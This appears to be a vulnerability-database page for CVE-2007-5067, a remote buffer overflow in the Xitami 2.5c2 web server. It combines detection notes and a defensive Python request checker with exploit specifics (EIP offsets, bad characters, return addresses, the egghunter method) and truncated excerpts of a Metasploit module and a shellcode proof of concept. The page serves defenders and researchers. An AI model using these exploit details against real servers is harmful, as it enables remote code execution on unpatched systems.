CVE-2007-5067
Published: 2007-09-24
Priority: P2 · 60 · high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 73.24% (99.4th percentile)
Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1) xigui32.exe or (2) xitami.exe.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| imatix | xitami | — | — |
Detection & IOCs (extracted from sources)
- Detect HTTP requests with an 'If-Modified-Since' header value beginning with 'Evil, ' followed by a long string — this is the exact malicious header format used in the exploit.
- For xigui32.exe, EIP overwrite occurs at offset 76 bytes (72 bytes padding + 4-byte return address) in the If-Modified-Since header value.
- For xitami.exe, EIP overwrite occurs at offset 104 bytes in the If-Modified-Since header value.
- The Metasploit module uses the Egghunter technique and places the egg tag in the Host header; detect HTTP requests where the Host header contains egghunter shellcode bytes alongside an oversized If-Modified-Since header.
- Fingerprint the vulnerable server by checking for 'Xitami' in the HTTP banner response to GET / HTTP/1.1.
- Bad characters for payload delivery are null byte, newline, and carriage return (\x00\x0a\x0d); presence of these in the If-Modified-Since header would indicate a non-exploit or broken attempt.
- The jmp esp return address (0x7CA76981 in shell32.dll) is specific to Windows XP SP2 Polish; the Metasploit module uses universal return addresses within xigui32.exe and xitami.exe themselves, making it OS-locale-independent.
- The Metasploit module targets Windows platforms only (w2ksp0, w2ksp4, xpsp0, xpsp2 en tested) and uses EXITFUNC=process.
- Payload space is constrained to 700 bytes, which is why the Metasploit module employs the Egghunter technique rather than embedding shellcode directly in the overflow buffer.
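A defender-side check, added here as an example and not part of this page or of either exploit: it parses a raw HTTP request and flags the header shapes the detection notes above describe (oversized or unparseable If-Modified-Since, the 'Evil, ' prefix with padding that reaches the 76/104-byte EIP offsets from the PoC comments, and non-printable bytes in Host). The sample requests are constructed, and the 64-byte size threshold and finding codes are assumptions.

```python
from email.utils import parsedate_to_datetime

# Offsets from the PoC comments on this page: "Evil, " followed by 76 "A"s (xigui32.exe)
# or 104 "A"s (xitami.exe) overwrites EIP. MAX_IMS_LEN is an assumption: a well-formed
# HTTP-date is under 32 bytes, so anything longer is already anomalous.
EVIL_PREFIX = b"Evil, "
EIP_OFFSETS = {"xigui32": 76, "xitami": 104}
MAX_IMS_LEN = 64

def parse_headers(raw: bytes) -> dict:
    """Return {lower-case name: value} for the headers of one raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep:
            headers.setdefault(name.strip().lower(), value.strip())
    return headers

def check_request(raw: bytes) -> list:
    """Return finding codes for one request (empty list = nothing suspicious)."""
    h = parse_headers(raw)
    findings = []
    ims = h.get(b"if-modified-since")
    if ims is not None:
        if len(ims) > MAX_IMS_LEN:
            findings.append("oversized_if_modified_since")
        try:  # older Pythons raise TypeError (None result), 3.10+ raise ValueError
            parsedate_to_datetime(ims.decode("latin-1"))
        except (TypeError, ValueError):
            findings.append("unparseable_if_modified_since")
        if ims.startswith(EVIL_PREFIX):
            findings.append("evil_prefix")
            pad = len(ims) - len(EVIL_PREFIX)
            for module, off in EIP_OFFSETS.items():
                if pad >= off:
                    findings.append(f"reaches_{module}_eip_offset")
    host = h.get(b"host", b"")
    # A Host value is a hostname or IP with an optional port; control or high bytes never belong there.
    if any(b < 0x20 or b > 0x7e for b in host):
        findings.append("nonprintable_host")
    return findings

# Constructed sample traffic (not captured from any real server).
BENIGN = (b"GET / HTTP/1.1\r\nHost: www.example.test\r\n"
          b"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\r\n\r\n")
POC_SHAPED = (b"GET / HTTP/1.1\r\nHost: www.example.test\r\n"
              b"If-Modified-Since: " + EVIL_PREFIX + b"A" * 104 + b"\r\n\r\n")
BINARY_HOST = (b"GET / HTTP/1.1\r\nHost: \x01\x90\x90www.example.test\r\n"
               b"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\r\n\r\n")
```

The three findings on the If-Modified-Since value are independent, so a long but well-formed date and a short malformed one each still raise exactly one code.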
No detection rules found.
Exploit-DB · 2010-08-25
Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)
---
##
# $Id: xitami_if_mod_since.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Xitami 2.5c2 Web Server If-Modified-Since Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the iMatix Corporation
Xitami Web Server. If a malicious user sends an If-Modified-Since
header containing an overly long string, it may be possible to
execute a payload remotely. Due to size constraints, this module uses
the Egghunter t
Exploit-DB · 2007-09-24
Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow
---
#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Details:..
#
# [Module xigui32.exe]
# If-Modified-Since: Evil, ["A" * 76]\r\n
# EIP 41414141
#
# [Module xitami.exe]
# If-Modified-Since: Evil, ["A" * 104]\r\n
# EIP 41414141
#
# Product Homepage: http://www.xitami.com/
# Just for fun ;)
##
from struct import pack
from time import sleep
from socket import *
host = "192.168.0.1"
port = 80
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8
Metasploit
Xitami 2.5c2 Web Server If-Modified-Since Overflow
This module exploits a stack buffer overflow in the iMatix Corporation Xitami Web Server. If a malicious user sends an If-Modified-Since header containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/26884
- http://www.securityfocus.com/bid/25772
- http://www.vupen.com/english/advisories/2007/3258
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36756
- https://www.exploit-db.com/exploits/4450